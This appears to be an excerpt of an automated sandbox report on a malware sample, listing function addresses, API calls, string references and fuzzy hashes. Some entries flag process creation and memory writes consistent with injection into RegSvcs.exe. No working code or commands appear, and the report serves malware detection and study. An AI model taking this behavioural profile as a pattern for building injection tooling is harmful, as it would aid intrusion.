RtlDebugPrintTimes.NTDLL ref: 0118D623
RtlDebugPrintTimes.NTDLL ref: 0118D651

Strings

$, xrefs: 0112C07C

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: cdf03299c370c8c17af6bbed85852b0066003a9cb506fbf80d1fbfbcf416405f
Instruction ID: 966718b284e8134130176ae5f230d60d0a506e8848e07f85eeac5186b85838b8
Opcode Fuzzy Hash: cdf03299c370c8c17af6bbed85852b0066003a9cb506fbf80d1fbfbcf416405f
Instruction Fuzzy Hash: 0C110C32A04218EBCF29AFA4F848A9D7B71FF44768F208519FD66672D0CB715A40CF40

Function 011AEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011AEFE1
RtlDebugPrintTimes.NTDLL ref: 011AF009
RtlDebugPrintTimes.NTDLL ref: 011AF0AC
RtlDebugPrintTimes.NTDLL ref: 011AF160

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 525abe255af8fccf78b425fde1a098640be93905218111222fdf53c10bfab94d
Instruction ID: 48e78eb6e5887c09fb61a6c3464dcdd342e36b310f12701674b4db3271dd235e
Opcode Fuzzy Hash: 525abe255af8fccf78b425fde1a098640be93905218111222fdf53c10bfab94d
Instruction Fuzzy Hash: D6713475E0021AAFDF09CFA8C984ADDBFB5BF48314F54402AE905EB254D774AA06CF91

Function 011AF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011AF26D
RtlDebugPrintTimes.NTDLL ref: 011AF292
RtlDebugPrintTimes.NTDLL ref: 011AF324
RtlDebugPrintTimes.NTDLL ref: 011AF378

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 138bf6eac9aa21d765d316a33ec399c01587d33dfdc8187b751d63bdf699d0af
Instruction ID: b116d9245f221d867ca04d5916d3c0c5693ec5cf366ea9ada239ec58a54f9a52
Opcode Fuzzy Hash: 138bf6eac9aa21d765d316a33ec399c01587d33dfdc8187b751d63bdf699d0af
Instruction Fuzzy Hash: E751447AE0021AAFEF09CF98D848ADDBFB1BF48314F54812AE905B7250D7749A06CF54

Function 01167B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01167B52
BaseThreadInitThunk.KERNEL32 ref: 01167B5C
RtlDebugPrintTimes.NTDLL ref: 011A49ED
RtlDebugPrintTimes.NTDLL ref: 011A4A70

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: da5dde44309d4f423d6a4511352d73a7ced9fe9aac1eb1299ddf4d691ed1d6f2
Instruction ID: fdee315667e9d37fd673b78363dbafea5f5e445c057087e80a700c8d73302b90
Opcode Fuzzy Hash: da5dde44309d4f423d6a4511352d73a7ced9fe9aac1eb1299ddf4d691ed1d6f2
Instruction Fuzzy Hash: EF313875E00229EFCF29DFA8E859A9DBBF0FB48724F14412AE912B7290DB755900CF54

Function 011359C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 01190AA7

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: af5dc3e9817b94d88863ec6fbff02126fd391bdba27625461e862764d061bbc8
Instruction ID: 39116fe0d529b81d318c54008e7bb465d1db2d8e490ea0e938f472805e8cc5a4
Opcode Fuzzy Hash: af5dc3e9817b94d88863ec6fbff02126fd391bdba27625461e862764d061bbc8
Instruction Fuzzy Hash: F7327770D0026ADFDF69CF68C884BEDBBB5BB48708F0081E9D549A7285D7749A84CF91

Function 01177D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01177E8B

Strings

+, xrefs: 01177DE8
-, xrefs: 01177DDD

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction ID: 4619ae4f4e3c9cc16f6257fc296e6d4d84e24bcf2b5af0b623a47560278e07d6
Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction Fuzzy Hash: 7491B471E002169BEF2CDF6DC988ABEBBB5EF44720F14451AE965E73C0DB3089408B52

Function 0114D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0114D3A4

Strings

l, xrefs: 0114D46B
Bl, xrefs: 0114D48C

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: fbaf73cb4eec053951064a8ca4a2bb2ade68b1080defca3f5413c118c4a415d5
Instruction ID: 68b94bf03733086174685cdba3df4f67c133d9cfa5ffb6e335681986b07a30db
Opcode Fuzzy Hash: fbaf73cb4eec053951064a8ca4a2bb2ade68b1080defca3f5413c118c4a415d5
Instruction Fuzzy Hash: 8EA1F731B003299BEF39DF98E894BADB7B1BB54B04F0540E9D90967641CB74AE84CF51

Function 01175DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 01175E34

Strings

pow, xrefs: 01175E0C, 01175E29

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 6e6c90c264e2bcf340daae8037f39b195ba7201f24046aa3dd56c2adb2bfd13a
Instruction ID: 256830c9bf83d3854a5d1bf854a46effdb2076c89dbe34777f4d84f171eb856c
Opcode Fuzzy Hash: 6e6c90c264e2bcf340daae8037f39b195ba7201f24046aa3dd56c2adb2bfd13a
Instruction Fuzzy Hash: B4518C7190C20696DB6EB61CE90537E7FB6EB00750F20CD58E0E686399EF3484D58B4B

Function 0115D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0115D959

Part of subcall function 01134859: RtlDebugPrintTimes.NTDLL ref: 011348F7

Strings

$, xrefs: 0115D86D
$, xrefs: 0115D900

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 4f5c527ea3975d078383ab4907369af93b40b6c19d268de28854b9a44bc1f130
Instruction ID: 4cc5dad87c2ff36391f2109d4a66c5fead9a2f9e7618176f873dd3b85534b232
Opcode Fuzzy Hash: 4f5c527ea3975d078383ab4907369af93b40b6c19d268de28854b9a44bc1f130
Instruction Fuzzy Hash: E951FF71A04346EFDF6CDFE8E48879DBBB1BF48318F248159D8256B285D774A881CB80

Function 011BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 011BCFBD

Strings

@4Cw@4Cw, xrefs: 011BCFD5, 011BCFDA, 011BCFF1
@, xrefs: 011BCF0A

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: d7b327a0d4cbb76c7b5c9b0f124e5e5ec08813d6f51fdb42ac71c0195a044077
Instruction ID: a381f0e0d42b8297cc955fb7274942bfaebf8b469cdcd85df94988dd4000bd0a
Opcode Fuzzy Hash: d7b327a0d4cbb76c7b5c9b0f124e5e5ec08813d6f51fdb42ac71c0195a044077
Instruction Fuzzy Hash: 5441C575900225EFDB29DFE9D880AADBBB8FF55B18F00406EE915DB254D734D801CB61

Function 011AFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011AFE73
RtlDebugPrintTimes.NTDLL ref: 011AFE95

Strings

$, xrefs: 011AFE3D

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: afe3be9486700bb41fe71cdb0949bbde83b5cef64815aaa66dc739d47115f319
Instruction ID: 7f3c8b25c157c03ebc5dbb0d3d464ba94c48cb7b22bf05cce6db030e795055f9
Opcode Fuzzy Hash: afe3be9486700bb41fe71cdb0949bbde83b5cef64815aaa66dc739d47115f319
Instruction Fuzzy Hash: 0341A079A0021AABDF29DF99D884AEEBFB5FF48704F550129EE04A7341C7719D12CB90

Function 0112DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0112E040

Strings

0, xrefs: 0112E020
0, xrefs: 0112E00B

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 93895aca409fe449984bef70cb305a87a8cae6c958dc17f0ebd1fdfd45378fd0
Instruction ID: 2804878609d8d15793196311cc6760cc39a32db6c584f227db6e0b885c55bfbe
Opcode Fuzzy Hash: 93895aca409fe449984bef70cb305a87a8cae6c958dc17f0ebd1fdfd45378fd0
Instruction Fuzzy Hash: CC418BB16087569FC714CF28D484A1ABBE4FB88718F04492EF988DB341D771EA16CF96

Analysis Process: KfYvtUBOq.exePID: 3360, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	183
Total number of Limit Nodes:	10

Executed Functions

Function 073B6662 Relevance: 2.7, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 073B66AE
, xrefs: 073B66A7

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 78514b8169ba284fef93456406bbc2b134844f0c7234a887e16d028ab1d0c391
Instruction ID: 08ccb52e4b1d3efd3de82e5d14a81219a0b0d42e798923f9cbdb059e311b676c
Opcode Fuzzy Hash: 78514b8169ba284fef93456406bbc2b134844f0c7234a887e16d028ab1d0c391
Instruction Fuzzy Hash: 2271C571920701CFEB01DF28D486A54BBF1FF85304B5586A9E949AB366EF71E8C4CB80

Function 073B46DC Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 073B66AE
, xrefs: 073B66A7

Memory Dump Source

Source File: 00000008.00000002.2191400621.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73b0000_KfYvtUBOq.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 7ba4ff3f02b5e88271b3eef82e9b0225a524bcd53fa3d45af52c7800cdef7e22
Instruction ID: 8991a1f508e53b27374f4adfd11f16c74d6d1dc87b30933f4603066c995cb9fe
Opcode Fuzzy Hash: 7ba4ff3f02b5e88271b3eef82e9b0225a524bcd53fa3d45af52c7800cdef7e22
Instruction Fuzzy Hash: EA719371920701CFEB00EF29D486955BBF1FF85314B5186A8E949AB366EF71F984CB80

Function 0730ABC4 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0730AE06

Memory Dump Source

Source File: 00000008.00000002.2191010559.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7300000_KfYvtUBOq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 422083c40b2b446ecf501faa7287fa4d4b1125e187de5bb63935b48f48df73ff
Instruction ID: 67f94cb536b9ead4b54c581bef6ce2b6a25de8b8912aec55f17bc2cc43f39748
Opcode Fuzzy Hash: 422083c40b2b446ecf501faa7287fa4d4b1125e187de5bb63935b48f48df73ff
Instruction Fuzzy Hash: 03A15CB1D0035ADFEB10CF68D8517EDBBB2BF48310F1485A9E849A7290DB749985CF91

Function 0730ABD0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0730AE06

Memory Dump Source

Source File: 00000008.00000002.2191010559.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7300000_KfYvtUBOq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7a689674b163154b189362b7c6e5907ae2619ee51d35044bad4bf2e0038f1efc
Instruction ID: 9e170dd7783a1b63f172f875e393c4d18f4c7025bb412b8896f7353b0fd30f89
Opcode Fuzzy Hash: 7a689674b163154b189362b7c6e5907ae2619ee51d35044bad4bf2e0038f1efc
Instruction Fuzzy Hash: F6914DB1D0031ADFEB10CF69D8517DDBBB2BF48310F1485A9E849A7280DB749985CF91

Function 051DADC8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 051DB01E

Memory Dump Source

Source File: 00000008.00000002.2188367864.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_51d0000_KfYvtUBOq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 363417aec6ec6d26d3190c49471b340b85cafad8f142498d0e6c8c1d9851ebf8
Instruction ID: 3a4b0a0f573bb3330e4a2538cb9ce6064fb62053f03fbc29430be77edc75911a
Opcode Fuzzy Hash: 363417aec6ec6d26d3190c49471b340b85cafad8f142498d0e6c8c1d9851ebf8
Instruction Fuzzy Hash: D5711470A00B059FD724DF2AD45576AFBF6BF88304F008A2DE44AD7A40DB75E845CBA5

Function 051D590D Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 051D59C9

Memory Dump Source

Source File: 00000008.00000002.2188367864.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_51d0000_KfYvtUBOq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ffcaedfc55cc2a617ae4bb824f93127825e2f41282113334cf919182aaecca25
Instruction ID: ca5786768f3dc069efaa7f5bdcd4282b36985a771a8c3cad25897896e9a2bb5c
Opcode Fuzzy Hash: ffcaedfc55cc2a617ae4bb824f93127825e2f41282113334cf919182aaecca25
Instruction Fuzzy Hash: 0651DFB1C00719CFDB24CFAAC8857DEBBF2AF48314F20806AD518AB251D7796946CF61

Function 051D44C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 051D59C9

Memory Dump Source

Source File: 00000008.00000002.2188367864.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_51d0000_KfYvtUBOq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c9ef2a727075b48d841701e55ffccd86845fbc25400a3c112f7854ccd4d19648
Instruction ID: 2563e14bd8b31c3526220c1b038a151f7cc1ebff9878f11df56ca5173a64ed30
Opcode Fuzzy Hash: c9ef2a727075b48d841701e55ffccd86845fbc25400a3c112f7854ccd4d19648
Instruction Fuzzy Hash: 7741C0B0C0062DCBDB24CFA9C884BDDBBB6BF49704F20816AD518AB251DB756945CFA0

Function 073D6770 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 073D680F

Memory Dump Source

Source File: 00000008.00000002.2191463535.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_73d0000_KfYvtUBOq.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: c83dec9fff87edac32a28cb5eb9aa4e8e386bf954cdd1560c489c2ecab03b1f4
Instruction ID: 39f037971fe22be60c54e94c0dc068597208afb97fc421fc81870cfba412929a
Opcode Fuzzy Hash: c83dec9fff87edac32a28cb5eb9aa4e8e386bf954cdd1560c489c2ecab03b1f4
Instruction Fuzzy Hash: C33107B6901209EFDB10CF99D844ADEFBF9FF48320F14842AE919A7210D775A954CFA1

Function 0730A942 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0730A9D8

Memory Dump Source

Source File: 00000008.00000002.2191010559.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7300000_KfYvtUBOq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5adc480edb6bdf241a424b0e4739db5bb52d4df1cb6a6a06f12b24bb9f4cda62
Instruction ID: dc467ea96f9891ad2870bbf1496a618f6e955ec82039f6b86d2792eeaa066486
Opcode Fuzzy Hash: 5adc480edb6bdf241a424b0e4739db5bb52d4df1cb6a6a06f12b24bb9f4cda62
Instruction Fuzzy Hash: 082137B190034D9FDB10CFA9C881BDEBBF5FF48320F14842AE958A7241C7789954CBA4

Function 073D6778 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 073D680F

Memory Dump Source

Source File: 00000008.00000002.2191463535.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

